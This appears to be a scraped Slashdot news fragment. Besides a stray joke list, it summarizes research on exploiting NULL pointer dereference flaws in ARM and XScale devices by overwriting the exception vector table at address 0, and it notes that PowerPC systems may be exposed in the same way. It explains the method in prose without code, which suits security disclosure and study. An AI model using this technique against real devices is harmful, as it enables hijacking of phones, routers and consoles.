Slashdot videos: Now with more Slashdot!
Tony Blair -> Middle East peace envoy
Martha Stewart -> Accountant
George Bush -> Pretzel Salesman (or is this a best match?)
The Spice Girls -> Musicians
But I'm sure you could all do better?"
In general, NULL pointer dereference flaws are considered non-exploitable. On the XScale and ARM architectures the memory address 0 is mapped, and also holds the exception vector table. The exception vector table is a set of branch instructions that correspond to different exceptions, such as software and hardware interrupts. When a case arises that writes to the 0 address with user-defined source data, it is possible to gain execution control by rewriting the exception table.
This method affects a lot of devices since most mobile phones and PDA are ARM based (iPhone?), and high-end routers often use the XScale architecture. The PowerPC architecture (used by Nintendo Wii, XBox360 and Playstation 3) also stores the vector table at a low address, and is likely vulnerable to this same attack.
This attack is more reliable than a remote stack overflow, due to the fact that no offsets are required. You will always be writing to address 0. The only data needed by an attacker is a copy of the vector table, which can be acquired by downloading and reversing the targets firmware.
Let me quote Barnaby: "As embedded exploitation is still in its infancy, I don't foresee a worm in the very near future — but yes, if a worm was targeting embedded devices, this would be a reliable attack vector.""
Link to Original Source